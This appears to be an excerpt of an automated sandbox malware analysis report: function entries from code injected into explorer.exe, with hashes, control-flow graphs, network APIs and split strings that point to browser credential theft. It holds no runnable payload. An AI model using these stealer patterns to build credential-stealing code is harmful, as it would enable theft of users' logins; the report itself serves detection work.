                                                                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                              • Instruction ID: f4313debbdef26f16a5806a5678ec72c83e3b28e17f17907895a88fa6fd64265
                                                                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                              • Instruction Fuzzy Hash: 3931C031614A1D8FCB04EFACC8847EDBBE1FB58204F41122AE54EDB240DE749645C799
                                                                                                              Function 0DEA78BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • ObtainUserAgentString.URLMON ref: 0DEA79A0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AgentObtainStringUser
                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                              • API String ID: 2681117516-319646191
                                                                                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                              • Instruction ID: 0bef9686e9a3f3806680b4ebb8be67e13e7f96668ad57838a4c9dd45e508612e
                                                                                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                              • Instruction Fuzzy Hash: F121C330614A5D8ECB05EFACC8847EDBBA1FF58204F41522AE55ADB240DF74D605C795
                                                                                                              Function 0DEA3B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 232 dea3b66-dea3b68 233 dea3b6a-dea3b6b 232->233 234 dea3b93-dea3bb8 232->234 235 dea3bbe-dea3c22 call deaa612 call deac942 * 2 233->235 236 dea3b6d-dea3b71 233->236 237 dea3bbb-dea3bbc 234->237 246 dea3c28-dea3c2b 235->246 247 dea3cdc 235->247 236->237 238 dea3b73-dea3b92 236->238 237->235 238->234 246->247 248 dea3c31-dea3cb0 call deaeda4 call deae022 call deae3e2 call deae022 call deae3e2 246->248 249 dea3cde-dea3cf6 247->249 261 dea3cb5-dea3cca CreateMutexExW 248->261 262 dea3cce-dea3cd3 261->262 262->247 263 dea3cd5-dea3cda 262->263 263->249
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateMutex
                                                                                                              • String ID: .dll$el32$kern
                                                                                                              • API String ID: 1964310414-1222553051
                                                                                                              • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                              • Instruction ID: 244a5c2d92032aa6ac305fff3beefbe0fb8d5fa18342d3d935e5328b6077522f
                                                                                                              • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                              • Instruction Fuzzy Hash: 72415A70A18A098FDB54EFA8C8947A977E0FF58300F01527AD94AEB255DE30E945CB85
                                                                                                              Function 0DEA3B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateMutex
                                                                                                              • String ID: .dll$el32$kern
                                                                                                              • API String ID: 1964310414-1222553051
                                                                                                              • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                              • Instruction ID: 052204ed6c298767027ae76c6a6c06fa3ea371a14b20001dc5fc494c2b0dadab
                                                                                                              • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                              • Instruction Fuzzy Hash: BD413C70A18A098FDB44EFA8C8947AD77E0FF68300F05517AD94EEB255DE30E945CB85
                                                                                                              Function 0DEA972E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 293 dea972e-dea9768 294 dea976a-dea9782 call deac942 293->294 295 dea9788-dea97ab connect 293->295 294->295
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: connect
                                                                                                              • String ID: conn$ect
                                                                                                              • API String ID: 1959786783-716201944
                                                                                                              • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                              • Instruction ID: face4e443573aace2cf836cf3a840c82af8ca9d9143aebc3b5cbd7ba29f3b6b8
                                                                                                              • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                              • Instruction Fuzzy Hash: A1015E34618B188FCB84EF1CE088B55B7E0FB58314F1545AEE90DCB226CA74D8818BC2
                                                                                                              Function 0DEA9732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 298 dea9732-dea9768 299 dea976a-dea9782 call deac942 298->299 300 dea9788-dea97ab connect 298->300 299->300
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: connect
                                                                                                              • String ID: conn$ect
                                                                                                              • API String ID: 1959786783-716201944
                                                                                                              • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                              • Instruction ID: 0b4cab5c13dd6235ba091ae77fd99dfb35a80d87f3f11a853cb2aa75f3a0f587
                                                                                                              • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                              • Instruction Fuzzy Hash: B1014F70618A1C8FCB84EF5CE488B55B7E0FB59314F1541AEE90DCB226CB74D9818BC2
                                                                                                              Function 0DEA96B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 411 dea96b2-dea96e5 412 dea96e7-dea96ff call deac942 411->412 413 dea9705-dea972d send 411->413 412->413
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: send
                                                                                                              • String ID: send
                                                                                                              • API String ID: 2809346765-2809346765
                                                                                                              • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                              • Instruction ID: aa99306383fcbefc47856587c64c67d1d51bb9414809679e10c17f1945bc6619
                                                                                                              • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                              • Instruction Fuzzy Hash: C7011270518A198FDB84EF1CD448B2577E0EB58314F1645AED85DCB266CA70D8818B81
                                                                                                              Function 0DEA95B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 416 dea95b2-dea95ea 417 dea960a-dea962b socket 416->417 418 dea95ec-dea9604 call deac942 416->418 418->417
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: socket
                                                                                                              • String ID: sock
                                                                                                              • API String ID: 98920635-2415254727
                                                                                                              • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                              • Instruction ID: ba4bc6e71b995bd1ebd60e30eff04d9c8ea486f3a2f85f7eac219ff2692ebb58
                                                                                                              • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                              • Instruction Fuzzy Hash: D2014470618A1C8FCB84EF1CD048B54BBE0FB59314F1545ADD45EDB266C7B0D981CB86
                                                                                                              Function 0DEA12DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 421 dea12dd-dea1320 call deac942 424 dea13fa-dea140e 421->424 425 dea1326 421->425 426 dea1328-dea1339 SleepEx 425->426 426->426 427 dea133b-dea1341 426->427 428 dea134b-dea1352 427->428 429 dea1343-dea1349 427->429 431 dea1370-dea1376 428->431 432 dea1354-dea135a 428->432 429->428 430 dea135c-dea136a call deabf12 429->430 430->431 434 dea1378-dea137e 431->434 435 dea13b7-dea13bd 431->435 432->430 432->431 434->435 439 dea1380-dea138a 434->439 436 dea13bf-dea13cf call dea1e72 435->436 437 dea13d4-dea13db 435->437 436->437 437->426 442 dea13e1-dea13f5 call dea10f2 437->442 439->435 440 dea138c-dea13b1 call dea2432 439->440 440->435 442->426
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                              • Instruction ID: c6e254a1560d7ce8de14bfab6fd29d0cf8beffa87962cbbba5934cf790e3b23b
                                                                                                              • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                              • Instruction Fuzzy Hash: 46318B74608F4ADFDB65EF2D80882A5B3A0FB54304F46527ECA2DDA506CB70E058CF91
                                                                                                              Function 0DEA1412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 457 dea1412-dea1446 call deac942 460 dea1448-dea1472 call deaec9e CreateThread 457->460 461 dea1473-dea147d 457->461
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                              • Instruction ID: 61408f85bd35db22437c254377a34a4103330e42bb5a0b13b08ce1c32450c3f0
                                                                                                              • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                              • Instruction Fuzzy Hash: FBF0C234268B494FD788EB2CD44563AB3D0EBA8214F45063EA64DD7264DE29D5814716

                                                                                                              Non-executed Functions

                                                                                                              Function 0EA00D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                              • API String ID: 0-393284711
                                                                                                              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                              • Instruction ID: 4bc3dba72ee6cf4c569179bb0f6d6ac67b622f658e9eb1cac71a2d645bbbb65b
                                                                                                              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                              • Instruction Fuzzy Hash: C6E15C70518B488FC765EF68D4947EBB7E0FB98301F504A2E959FC7291DF30A9418B89
                                                                                                              Function 0EA03792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                              • API String ID: 0-2916316912
                                                                                                              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                              • Instruction ID: d8d7eebc5f92d7999a11bd476a21cffe36712ede311f2574da8406563e0862dc
                                                                                                              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                              • Instruction Fuzzy Hash: 5EB19E30518B488EDB54EF68D589AEEB7F1FF98300F50491ED49AC7251DF709909CB86
                                                                                                              Function 0EA01622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                              • API String ID: 0-1539916866
                                                                                                              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                              • Instruction ID: 397f6f5da29e4c3e6a659c366a1e80b6430491a9d78025b2dabc2df8c567a800
                                                                                                              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                              • Instruction Fuzzy Hash: 4641B170A18B08CFDB14DF88A4896BE7BE2FB5C704F00025ED409D3285DBB59D458BD6
                                                                                                              Function 0EA08AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                              • API String ID: 0-355182820
                                                                                                              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                              • Instruction ID: 5f3c9d7daa0bf81bf153244d37f7e7bcfee7bcad3066f89450d261d2944ac0fd
                                                                                                              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                              • Instruction Fuzzy Hash: 67C15B70618B098FC758EF24D495ADAF3E1FB98304F404A2E949EC7250DF30E915CB8A
                                                                                                              Function 0EA08F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                              • API String ID: 0-97273177
                                                                                                              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                              • Instruction ID: e3896c25bddaa562c3a848d2d4dfdad36d029a57d485af8afe209783d77a283f
                                                                                                              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                              • Instruction Fuzzy Hash: AB51B33161C7488FD719DF18D4852ABB7E5FBC9700F501A2EE8DB87242DBB49906CB86
                                                                                                              Function 0EA022F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                              • API String ID: 0-639201278
                                                                                                              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                              • Instruction ID: d69ea1b3e3fa0d29e5bec505af9a1f103a932a5686c083017b5874c882889bbf
                                                                                                              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                              • Instruction Fuzzy Hash: 8AC19070618A198FC758EF68E495AEAB3E1FB9C300F414769940AC7295DF30AE01CBC9
                                                                                                              Function 0EA022F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                              • API String ID: 0-639201278
                                                                                                              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                              • Instruction ID: fd716134ab91db27c8b2d2bd8186ce3de267426ed018d703796525846cc0fa39
                                                                                                              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                              • Instruction Fuzzy Hash: 82C18070618A198FC758EF68E495AEAB3E1FB9C300F414769944AC7295DF30AE01CBD9
                                                                                                              Function 0EA03CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                              • API String ID: 0-2058692283
                                                                                                              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                              • Instruction ID: a100da03c9fa7d42d843a20ceb4377649e576dcfa312a056c99c47dc963780fb
                                                                                                              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                              • Instruction Fuzzy Hash: B7A1A2706187488FDB29EF68E5447EEB7E1FF88300F404A2DE48AD7291EF7499458789
                                                                                                              Function 0EA03CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                              • API String ID: 0-2058692283
                                                                                                              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                              • Instruction ID: 34f9312aee0f12a09870417efce2e9d7d264f5a9da3a99abc65b91ee5b84b8d2
                                                                                                              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                              • Instruction Fuzzy Hash: B69191706187488FDB29EFA8E5447EEB7E1FF88300F40462DE44AD7291DF7499498789
                                                                                                              Function 0EA03352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $.$e$n$v
                                                                                                              • API String ID: 0-1849617553
                                                                                                              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                              • Instruction ID: fdd150077dfbbc5208a2d65c574def2cd681c354ff4b38e6f789118ffa0e6234
                                                                                                              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                              • Instruction Fuzzy Hash: 1D718431618B488FDB58EF68D4847AAB7F1FF98305F00062ED45AC7261EB71ED458B85
                                                                                                              Function 0E9FEC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                              • API String ID: 0-1970020201
                                                                                                              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                              • Instruction ID: 55367b44e487f1698b9db4687e173871b69323b7e56e67afcc06cac467494b2c
                                                                                                              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                              • Instruction Fuzzy Hash: BD515DB0918B4C8FDB55EFA4D044AEEB7F1FF58301F404A2EA59AE7254EF3095418B89
                                                                                                              Function 0E9FF86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4$\$dll$ion.$vers
                                                                                                              • API String ID: 0-1610437797
                                                                                                              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                              • Instruction ID: 68fff690f8abf96016cc5dd7490a650854ce54441e7ae3606b085dcce8f1e4d7
                                                                                                              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                              • Instruction Fuzzy Hash: C9416F30218B488FCB65EF2498557EA73E4FF98301F454A2E995EC7240EF30D905CB86
                                                                                                              Function 0EA014B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 32.d$cli.$dll$sspi$user
                                                                                                              • API String ID: 0-327345718
                                                                                                              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                              • Instruction ID: 3ae08187caaa4a0096b5e46610acd3e3a785ed1699aee986889546914a198a2c
                                                                                                              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                              • Instruction Fuzzy Hash: 29416F30A19E0D8FCB54EF58A0957ED73E5FB6C300F44056AA80AD7280DA70ED50CBCA
                                                                                                              Function 0E9FF432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .dll$el32$h$kern
                                                                                                              • API String ID: 0-4264704552
                                                                                                              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                              • Instruction ID: f059a01df45cc2178a425fb270aeaf7d52f31b560959539fe24ddbef18e15820
                                                                                                              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                              • Instruction Fuzzy Hash: 62418F70608B488FDB69DF2880983AAB7E1FBD8301F144A2ED59EC3265DB70C945CB85
                                                                                                              Function 0EA060B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                              • API String ID: 0-3434893486
                                                                                                              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
